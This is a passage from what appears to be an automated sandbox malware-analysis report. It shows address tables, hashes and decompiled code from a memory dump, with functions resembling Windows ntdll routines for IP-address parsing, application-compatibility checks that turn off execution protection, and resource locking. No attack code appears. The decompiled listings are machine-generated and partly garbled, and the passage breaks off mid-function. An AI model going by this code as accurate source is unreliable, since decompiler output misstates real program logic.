                                                  0x0235e928
                                                  0x0235e982
                                                  0x0235e98a
                                                  0x00000000
                                                  0x0235e99a
                                                  0x0235e99e
                                                  0x0235e9a3
                                                  0x0235e9a8
                                                  0x0235e9b9
                                                  0x0235e978
                                                  0x00000000
                                                  0x0235e978
                                                  0x0235e98a
                                                  0x0235e92a
                                                  0x0235e931
                                                  0x0235e944
                                                  0x0235e944
                                                  0x0235e950
                                                  0x0235e954
                                                  0x0235e959
                                                  0x0235e95e
                                                  0x0235e963
                                                  0x0235e970
                                                  0x00000000
                                                  0x0235e975
                                                  0x0235e93b
                                                  0x0235e980
                                                  0x00000000
                                                  0x0235e980
                                                  0x0235e942
                                                  0x0235e94b
                                                  0x00000000
                                                  0x0235e94b
                                                  0x00000000
                                                  0x0235e942
                                                  0x023313f4
                                                  0x023313f4
                                                  0x023313f9
                                                  0x023313fc
                                                  0x023313ff
                                                  0x02331406
                                                  0x0235e9cc
                                                  0x0235e9d2
                                                  0x0235e9d2
                                                  0x0235e9cc
                                                  0x0233140c
                                                  0x02331411
                                                  0x02331431
                                                  0x0233143a
                                                  0x0233143c
                                                  0x0233143f
                                                  0x0233143f
                                                  0x02331442
                                                  0x02331447
                                                  0x023314a8
                                                  0x023314ac
                                                  0x0235e9e2
                                                  0x0235e9e7
                                                  0x0235e9ec
                                                  0x0235ea05
                                                  0x0235ea05
                                                  0x00000000
                                                  0x02331449
                                                  0x00000000
                                                  0x02331449
                                                  0x0233144c
                                                  0x02331459
                                                  0x02331462
                                                  0x02331469
                                                  0x0233146a
                                                  0x02331470
                                                  0x02331473
                                                  0x02331476
                                                  0x02331476
                                                  0x02331490
                                                  0x02331495
                                                  0x0233138e
                                                  0x02331390
                                                  0x02331397
                                                  0x02331398
                                                  0x02331399
                                                  0x023313a1
                                                  0x023313a4
                                                  0x023313a4
                                                  0x02331498
                                                  0x0233149c
                                                  0x0233149f
                                                  0x023314a2
                                                  0x00000000
                                                  0x00000000
                                                  0x023314a4
                                                  0x00000000
                                                  0x023314a4
                                                  0x02331413
                                                  0x02331415
                                                  0x02331416
                                                  0x02331419
                                                  0x0233141c
                                                  0x02331422
                                                  0x023313b7
                                                  0x023313bc
                                                  0x023313bf
                                                  0x023313bf
                                                  0x023313c2
                                                  0x02331424
                                                  0x02331424
                                                  0x02331424
                                                  0x02331427
                                                  0x0233142b
                                                  0x0233142c
                                                  0x0233142c
                                                  0x0233142c
                                                  0x00000000
                                                  0x0233141c
                                                  0x02331411

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666622449.00000000022E0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: true
                                                  • Associated: 00000007.00000002.666615943.00000000022D0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666691395.00000000023C0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666697417.00000000023D0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666703330.00000000023D4000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666708873.00000000023D7000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666713954.00000000023E0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666740002.0000000002440000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                  • API String ID: 48624451-2108815105
                                                  • Opcode ID: 8515bfb39c4ad542051fb6e7af01359bf7e27370bea951cca881f0509b632ca9
                                                  • Instruction ID: 55873b3b59d7d81323d36a69c64ef1b30f21bf6fd3993815ef9c5803539c00b8
                                                  • Opcode Fuzzy Hash: 8515bfb39c4ad542051fb6e7af01359bf7e27370bea951cca881f0509b632ca9
                                                  • Instruction Fuzzy Hash: D36104B1E04665AADF35DF99C8809BEBBB6EF84310B14C12DE9DE47540D734A740CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02327EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 64%
                                                  			E02327EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x23d2088; // 0x766f104e
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E02327F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02343F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E022FDFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x23d4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02343F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E02300D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02343F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E02308375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02343F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0236E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02343F92();
					_t38 = 1;
					L2:
					return E022FE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                  0x02327f08
                                                  0x02327f0f
                                                  0x02327f12
                                                  0x02327f1b
                                                  0x02327f31
                                                  0x02343ead
                                                  0x02343eb4
                                                  0x00000000
                                                  0x00000000
                                                  0x02343eba
                                                  0x02343ecd
                                                  0x02343ed2
                                                  0x02343ee1
                                                  0x02343ee7
                                                  0x02343eec
                                                  0x02343f12
                                                  0x02343f18
                                                  0x02343f1a
                                                  0x00000000
                                                  0x00000000
                                                  0x02343f20
                                                  0x02343f26
                                                  0x02343f28
                                                  0x00000000
                                                  0x00000000
                                                  0x02343f2e
                                                  0x02343f30
                                                  0x00000000
                                                  0x00000000
                                                  0x02343f3a
                                                  0x02343f3b
                                                  0x02343f53
                                                  0x02343f64
                                                  0x02343f69
                                                  0x02343f6c
                                                  0x02343f6d
                                                  0x02343f6f
                                                  0x0234e304
                                                  0x0234e30f
                                                  0x0234e315
                                                  0x0234e31e
                                                  0x0234e321
                                                  0x0234e327
                                                  0x0234e329
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0234e32f
                                                  0x0234e32f
                                                  0x0234e337
                                                  0x0234e33a
                                                  0x0234e33b
                                                  0x0234e33d
                                                  0x0234e33f
                                                  0x0234e341
                                                  0x0234e341
                                                  0x0234e34e
                                                  0x0234e353
                                                  0x0234e358
                                                  0x0234e35d
                                                  0x0234e35f
                                                  0x00000000
                                                  0x00000000
                                                  0x0234e365
                                                  0x0234e365
                                                  0x0234e368
                                                  0x0234e36e
                                                  0x00000000
                                                  0x00000000
                                                  0x0234e374
                                                  0x0234e32f
                                                  0x02343f75
                                                  0x02343f7a
                                                  0x02343f7c
                                                  0x02343f7e
                                                  0x02343f86
                                                  0x02327f39
                                                  0x02327f47
                                                  0x02327f47
                                                  0x02327f37
                                                  0x02327f37
                                                  0x00000000

                                                  APIs
                                                  • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02343F12
                                                  Strings
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 0234E345
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02343F4A
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02343EC4
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02343F75
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0234E2FB
                                                  • ExecuteOptions, xrefs: 02343F04
                                                  • Execute=1, xrefs: 02343F5E
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666622449.00000000022E0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: true
                                                  • Associated: 00000007.00000002.666615943.00000000022D0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666691395.00000000023C0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666697417.00000000023D0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666703330.00000000023D4000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666708873.00000000023D7000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666713954.00000000023E0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666740002.0000000002440000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: BaseDataModuleQuery
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 3901378454-484625025
                                                  • Opcode ID: 27b444df6a2628957f80e8498c51e69d7ed1dec5be495e5c700844f8c1658c9a
                                                  • Instruction ID: 5137c5a1ce562ca61bae84b0f78dc63b5bfd35ecde718946efaed3509b9f8ead
                                                  • Opcode Fuzzy Hash: 27b444df6a2628957f80e8498c51e69d7ed1dec5be495e5c700844f8c1658c9a
                                                  • Instruction Fuzzy Hash: 9E41A97169031DBAEB20DA94DCC5FDAB3FDAF15704F0005E5E605E6081EB70EA458F61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02330B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E02330B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E02308980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E022FDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02330CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02330CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E023306BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E023306BA(_t135, _t178) == 0 || E02330A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02330CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02330CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E023306BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E023306BA(_t124, _t142) == 0 || E02330A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                  0x02330b21
                                                  0x02330b24
                                                  0x02330b27
                                                  0x02330b2a
                                                  0x02330b2d
                                                  0x02330b30
                                                  0x02330b33
                                                  0x02330b36
                                                  0x02330b39
                                                  0x02330b3e
                                                  0x02330c65
                                                  0x02330c68
                                                  0x02330c6a
                                                  0x02330c6f
                                                  0x0235eb42
                                                  0x00000000
                                                  0x00000000
                                                  0x0235eb48
                                                  0x0235eb48
                                                  0x02330c75
                                                  0x02330c7a
                                                  0x0235eb54
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0235eb5a
                                                  0x02330c80
                                                  0x02330c84
                                                  0x0235eb98
                                                  0x00000000
                                                  0x00000000
                                                  0x0235eba6
                                                  0x02330cb8
                                                  0x02330cba
                                                  0x02330cd3
                                                  0x02330cda
                                                  0x02330ce4
                                                  0x02330ce9
                                                  0x00000000
                                                  0x02330cec
                                                  0x02330c8c
                                                  0x0235eb63
                                                  0x00000000
                                                  0x00000000
                                                  0x0235eb70
                                                  0x0235eb75
                                                  0x0235eb7d
                                                  0x00000000
                                                  0x00000000
                                                  0x0235eb8c
                                                  0x00000000
                                                  0x0235eb8c
                                                  0x02330c96
                                                  0x00000000
                                                  0x00000000
                                                  0x02330ca2
                                                  0x02330cac
                                                  0x02330cb4
                                                  0x00000000
                                                  0x00000000
                                                  0x02330b44
                                                  0x02330b47
                                                  0x02330b49
                                                  0x00000000
                                                  0x00000000
                                                  0x02330b4f
                                                  0x02330b50
                                                  0x00000000
                                                  0x00000000
                                                  0x02330b56
                                                  0x02330b62
                                                  0x02330b7c
                                                  0x02330bac
                                                  0x02330a0f
                                                  0x0235eaaa
                                                  0x00000000
                                                  0x0235eac4
                                                  0x0235eac4
                                                  0x02330bd0
                                                  0x02330bd0
                                                  0x02330bd4
                                                  0x02330bd9
                                                  0x00000000
                                                  0x00000000
                                                  0x02330bdb
                                                  0x02330be0
                                                  0x0235eb0e
                                                  0x02330a1a
                                                  0x00000000
                                                  0x02330a1a
                                                  0x0235eb1a
                                                  0x0235eb1f
                                                  0x0235eb27
                                                  0x00000000
                                                  0x00000000
                                                  0x0235eb36
                                                  0x00000000
                                                  0x0235eb36
                                                  0x02330bea
                                                  0x00000000
                                                  0x00000000
                                                  0x02330bf6
                                                  0x02330c00
                                                  0x02330c03
                                                  0x02330c0b
                                                  0x00000000
                                                  0x02330c0b
                                                  0x0235eaaa
                                                  0x00000000
                                                  0x02330a15
                                                  0x02330bb6
                                                  0x00000000
                                                  0x02330bc6
                                                  0x02330bc6
                                                  0x02330bcb
                                                  0x02330c15
                                                  0x00000000
                                                  0x00000000
                                                  0x02330c1d
                                                  0x02330c20
                                                  0x02330c21
                                                  0x02330c24
                                                  0x02330c24
                                                  0x02330c26
                                                  0x00000000
                                                  0x02330c26
                                                  0x02330bcd
                                                  0x00000000
                                                  0x02330bcd
                                                  0x02330b89
                                                  0x02330b89
                                                  0x02330b90
                                                  0x00000000
                                                  0x00000000
                                                  0x02330b96
                                                  0x00000000
                                                  0x02330b96
                                                  0x02330a04
                                                  0x02330a04
                                                  0x02330b9a
                                                  0x02330b9a
                                                  0x02330b9b
                                                  0x02330b9f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x02330ba5
                                                  0x02330ac7
                                                  0x02330aca
                                                  0x0235eacf
                                                  0x00000000
                                                  0x0235eade
                                                  0x0235eade
                                                  0x0235eae3
                                                  0x00000000
                                                  0x00000000
                                                  0x0235eaf3
                                                  0x0235eaf6
                                                  0x0235eaf7
                                                  0x0235eafe
                                                  0x0235eb01
                                                  0x00000000
                                                  0x0235eb01
                                                  0x0235eacf
                                                  0x02330ad0
                                                  0x02330ad4
                                                  0x00000000
                                                  0x00000000
                                                  0x02330ada
                                                  0x02330ae6
                                                  0x02330c34
                                                  0x00000000
                                                  0x02330c47
                                                  0x02330c49
                                                  0x02330c4a
                                                  0x02330c4e
                                                  0x02330c51
                                                  0x02330c54
                                                  0x02330c57
                                                  0x02330c5a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x02330c60
                                                  0x02330afb
                                                  0x02330afe
                                                  0x02330b02
                                                  0x02330b05
                                                  0x02330b08
                                                  0x00000000
                                                  0x02330b08
                                                  0x02330ae6
                                                  0x02330b44
                                                  0x023309f8
                                                  0x023309f8
                                                  0x023309f9
                                                  0x00000000
                                                  0x00000000
                                                  0x0235eaa0
                                                  0x00000000

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.666622449.00000000022E0000.00000040.00000001.sdmp, Offset: 022D0000, based on PE: true
                                                  • Associated: 00000007.00000002.666615943.00000000022D0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666691395.00000000023C0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666697417.00000000023D0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666703330.00000000023D4000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666708873.00000000023D7000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666713954.00000000023E0000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000007.00000002.666740002.0000000002440000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: __fassign
                                                  • String ID: .$:$:
                                                  • API String ID: 3965848254-2308638275
                                                  • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                  • Instruction ID: b31c25c61a207ffa525e000487b89ced88b4f68c573173bf5f5dc84ae93563c1
                                                  • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                  • Instruction Fuzzy Hash: 6BA1AC71D0421AEFCF2ECF64C8457BEB7B9AF05309F28846AD852AB282D7349745CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02330554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 50%
                                                  			E02330554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x023d01c0;
									_push(_t144);
									_push(0);
									_t51 = E022EF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02334FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02343F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02343F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0237217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02343F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02333915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x023d01c0;
												_push(_t138);
												_push(0);
												_t58 = E022EF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02334FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02343F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02343F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0237217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02343F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02333915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E02315384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E022EF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02333915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E022EF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02333915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E022EF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02333915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E02315329(_t110, _t138);
																_t69 = E023153A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
